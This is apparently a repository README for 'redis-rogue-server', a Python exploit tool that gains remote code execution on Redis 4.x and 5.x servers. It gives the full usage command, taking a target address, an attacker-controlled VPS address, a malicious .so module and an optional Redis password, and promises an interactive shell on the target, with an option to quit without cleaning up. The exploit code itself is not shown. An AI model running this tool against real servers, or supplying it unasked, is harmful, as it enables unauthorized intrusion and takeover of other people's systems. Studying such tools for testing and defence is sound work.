/redis-rogue-server

Redis 4.x/5.x RCE refer to LC/BC.

Primary LanguagePython

Redis 4.x/Redis 5.x RCE EXP

tech reference: Redis post-exploitation.

test passed by Redis 5.0.9.

Prepare:

Usage:

python3 redis-rogue-server.py --rhost <target address> [--rport <target port>] --lhost <vps address> [--lport <vps port>] [--so <.so filename>] [--rpasswd <redis auth>]

Finally, you will get a interactive shell. Use exit to quit and clean rhost server or use ctrl-C to quit without clean.